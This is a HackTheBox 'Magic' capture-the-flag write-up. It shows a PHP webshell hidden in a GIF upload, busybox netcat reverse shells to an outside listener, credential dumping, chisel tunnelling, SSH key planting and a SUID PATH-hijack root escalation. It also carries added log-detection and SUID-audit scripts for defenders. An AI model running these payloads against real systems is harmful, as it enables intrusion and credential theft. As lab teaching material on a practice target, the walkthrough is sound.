xsspresso
Web, Medium, Linux

HTB — Magic

Magic Portfolio with SQLi bypass on login. File upload bypass with double extension for PHP webshell. mysqldump credential extraction and SUID sysinfo for root.

January 20, 2025, HackTheBox
#SQLi #File Upload Bypass #SUID #MySQL

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 00:22 EST
Nmap scan report for 10.10.10.185
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/20%OT=22%CT=1%CU=35591%PV=Y%DS=2%DC=T%G=Y%TM=678D
OS:DDB9%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST
OS:11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=F
OS:E88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M
OS:53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y
OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%
OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   20.86 ms 10.10.14.1
2   21.07 ms 10.10.10.185
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.24 seconds

80/tcp open http

sh
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio

sql injection

upload

sh
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
  • upload location: /images/uploads/guaca.jpg

  • rename to a double extension: guaca.php.jpg

  • insert the webshell in the middle of the image file

rev shell

http://10.10.10.185/images/uploads/guaca.php.jpg?cmd=busybox+nc+10.10.14.6+1234+-e+/bin/bash

sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.185] 54902
whoami
www-data
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
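The reverse-shell request above leaves a distinctive trace in the Apache access log: a file under the upload directory with a script-like name segment, carrying a query string, on a path that should only ever serve static images. As an added example (not part of the writeup), the detection below parses combined-format log lines and flags exactly those properties. The log lines are constructed for this example; the attack line mirrors the URL shown above, and the upload directory and parameter names are assumptions.

```python
"""Added example, not part of the writeup: access-log detection for the
webshell request. SAMPLE_LOG is constructed; UPLOAD_DIR and COMMAND_PARAMS
are assumptions based on the URL the writeup uses."""
import re
from urllib.parse import parse_qs, urlsplit

UPLOAD_DIR = "/images/uploads/"
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
COMMAND_PARAMS = {"cmd"}  # the parameter used on this box; extend locally

# Apache combined log format, matched up to the response size field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)


def inspect_request(target: str) -> list[str]:
    """Why a request for something under the upload directory looks wrong."""
    parts = urlsplit(target)
    if not parts.path.startswith(UPLOAD_DIR):
        return []
    reasons = []
    name = parts.path.rsplit("/", 1)[-1].lower()
    if any(seg in EXECUTABLE_EXTS for seg in name.split(".")[1:]):
        reasons.append("script extension segment under upload dir")
    if parts.query:
        # Static images take no parameters; a query string here is itself odd.
        reasons.append("query string on an upload-dir file")
        hit = COMMAND_PARAMS & set(parse_qs(parts.query).keys())
        if hit:
            reasons.append("command-like parameter: " + ",".join(sorted(hit)))
    return reasons


def analyze_log(lines) -> list[dict]:
    """Return one alert per suspicious request; unparseable lines are skipped."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m["target"])
        if reasons:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                           "target": m["target"], "reasons": reasons})
    return alerts


# Constructed log lines; the fourth mirrors the request in the writeup.
SAMPLE_LOG = [
    '10.10.14.6 - - [20/Jan/2025:00:31:02 -0500] "GET /index.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '10.10.14.6 - - [20/Jan/2025:00:35:40 -0500] "POST /upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.10.14.6 - - [20/Jan/2025:00:35:41 -0500] "GET /images/uploads/guaca.jpg HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '10.10.14.6 - - [20/Jan/2025:00:38:12 -0500] "GET /images/uploads/guaca.php.jpg?cmd=busybox+nc+10.10.14.6+1234+-e+/bin/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["status"], alert["target"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

The query-string rule is the most durable of the three: a renamed parameter or a different extension trick defeats the other two, but a static image directory that suddenly receives parameters is anomalous regardless of payload.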

creds

sh
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';
 
    private static $cont  = null;

theseus:iamkingtheseus

sh
www-data@magic:/var/www/Magic$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:631                 :::*                    LISTEN      -                   
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:631             0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:60075           0.0.0.0:*                           -                   
udp6       0      0 :::5353                 :::*                                -                   
udp6       0      0 :::57859                :::*                              

local port forwarding

sh
./chisel server --reverse --port 1234
sh
www-data@magic:/tmp$ ./chisel client 10.10.14.6:1234 R:3306:127.0.0.1:3306
sh
mysql -h 127.0.0.1 -u theseus -p''
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Magic              |
+--------------------+
2 rows in set (0.023 sec)
sh
MySQL [(none)]> use Magic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
MySQL [Magic]> show tables;
+-----------------+
| Tables_in_Magic |
+-----------------+
| login           |
+-----------------+
1 row in set (0.030 sec)
sh
MySQL [Magic]> select * from login;
+----+----------+----------------+
| id | username | password       |
+----+----------+----------------+
|  1 | admin    | Th3s3usW4sK1ng |
+----+----------+----------------+
1 row in set (0.027 sec)

creds

admin:Th3s3usW4sK1ng

sh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.185] 54886
su theseus
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
Password: Th3s3usW4sK1ng
 
theseus@magic:/var/www/Magic/images/uploads$ whoami
whoami
theseus

user.txt

sh
theseus@magic:~$ cat user.txt
cat user.txt
81d91ad7...
sh
theseus@magic:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCOVo6gKQHsVnlvebJJ6R6wydgZoQvn78Hho9MMpLiSMfNCrS1xCnuKxAPfBulLdkdFHjz/gZz1cZZZcdAEXrU6zfgegux04S0Rl5+ny1xBrm098qz1EL274hQYho2Ezqkct7r3KaqPk2Do+ZOS9AZFC7CbeP3DrsK5kibTIE9KhYrb1+++XWGdqRqPUCMp2XbuvPLkfORDUCxzJiGTcm979IGlYgAaTafyZUwkSD3++fIQ0JWbTicn2rCKM6IAcR0cqhO1AWKf22hDKbkRczjtOTYZmx/SE6NwKYY0buxpaXrp8mIb5zFmwF08U19jcCyLjTmsLjZpTUgqWUMbfUeW47a/LIRzFx20BbWs/fs+pNbQqh05e3/VrZyzPOhu0uKqMugJBafEoR9oZIOUzywp1hFaTdji7bkh9MlziY/0L86i1+kUNxaGFbdbdETGuks5ydZDnl+GajuuqCruQA4GPRPECw3qzgO2oWTsVdOZKMdRjVuLOOq5tYkszV4ofRk= root@kali' > authorized_keys

SUID /bin/sysinfo path hijack

  • the SUID binary calls lshw without its full path, so the binary is resolved through the caller's PATH
sh
theseus@magic:~$ echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/lshw.c
sh
theseus@magic:~$ gcc /tmp/lshw.c -o /tmp/lshw
sh
theseus@magic:/tmp$ export PATH=/tmp:$PATH
sh
theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
  • get a reverse shell with busybox
sh
root@magic:/home# busybox nc 10.10.14.6 1234 -e /bin/bash
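The root cause of the escalation above is a setuid-root binary that runs a helper by bare name, so the caller's PATH decides which lshw executes. The fix is to invoke helpers by absolute path with a sanitised environment (or to drop the setuid bit), and the audit below, added here as an example and not part of the writeup, finds candidates for that fix: it extracts printable strings from a binary the way `strings` does, splits shell-style command lines at separators, and reports every command whose program name is not an absolute path, alongside a setuid-root check on the file mode. KNOWN_COMMANDS and FAKE_RODATA are constructed for this example; the real box's binary is only read if you call audit_binary() on it.

```python
"""Added example, not part of the writeup: audit for setuid-root binaries that
shell out to helpers by bare name (the /bin/sysinfo pattern). KNOWN_COMMANDS
is our own list and FAKE_RODATA is a constructed stand-in for a binary."""
import os
import re
import stat

# Helpers that "system information" tools commonly shell out to (our list).
KNOWN_COMMANDS = {"lshw", "fdisk", "cat", "free", "lscpu", "df", "uname", "ip"}

# Printable runs of four or more bytes, i.e. what `strings` extracts.
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")
# Shell separators, so each simple command in "a -x | b -y" is inspected.
SEPARATOR_RE = re.compile(r"\s*(?:\|\||&&|[|;&])\s*")


def printable_strings(blob: bytes) -> list[str]:
    return [m.group().decode("ascii") for m in STRING_RE.finditer(blob)]


def relative_commands(blob: bytes) -> list[str]:
    """Command strings whose program is a bare name resolved through PATH."""
    findings = []
    for s in printable_strings(blob):
        for cmd in SEPARATOR_RE.split(s):
            words = cmd.split()
            if not words:
                continue
            # "/bin/cat ..." is safe from PATH games; "cat ..." is not.
            if words[0] in KNOWN_COMMANDS:
                findings.append(cmd)
    return findings


def is_setuid_root(mode: int, uid: int) -> bool:
    """True when the file is owned by root and has the setuid bit."""
    return uid == 0 and bool(mode & stat.S_ISUID)


def audit_blob(blob: bytes, mode: int, uid: int) -> dict:
    """Combine both checks; a finding matters most when both are true."""
    rel = relative_commands(blob)
    suid = is_setuid_root(mode, uid)
    return {"setuid_root": suid, "relative_commands": rel,
            "path_hijackable": suid and bool(rel)}


def audit_binary(path: str) -> dict:
    """Run the audit against a real file on disk (e.g. /bin/sysinfo)."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        blob = fh.read()
    return audit_blob(blob, st.st_mode, st.st_uid)


# Constructed stand-in for the .rodata of a sysinfo-style binary. Only the
# banner text mirrors the writeup's output; the command strings are ours.
FAKE_RODATA = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"====================Hardware Info====================\x00"
    + b"lshw -short\x00"
    + b"====================Disk Info====================\x00"
    + b"fdisk -l\x00"
    + b"/bin/cat /proc/cpuinfo\x00"
    + b"free -h | head -2\x00"
)

if __name__ == "__main__":
    # 0o104755 is -rwsr-xr-x: a regular file with the setuid bit.
    result = audit_blob(FAKE_RODATA, 0o104755, 0)
    print("setuid root     :", result["setuid_root"])
    print("PATH-hijackable :", result["path_hijackable"])
    for cmd in result["relative_commands"]:
        print("  bare command  :", cmd)
```

Absolute paths such as /bin/cat are deliberately not reported; the heuristic is string-based, so a hit still needs confirming against the binary's behaviour, but it turns up the same evidence the writeup relied on in a form a system owner can act on.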

root.txt

sh
cat root.txt
4ede47b5...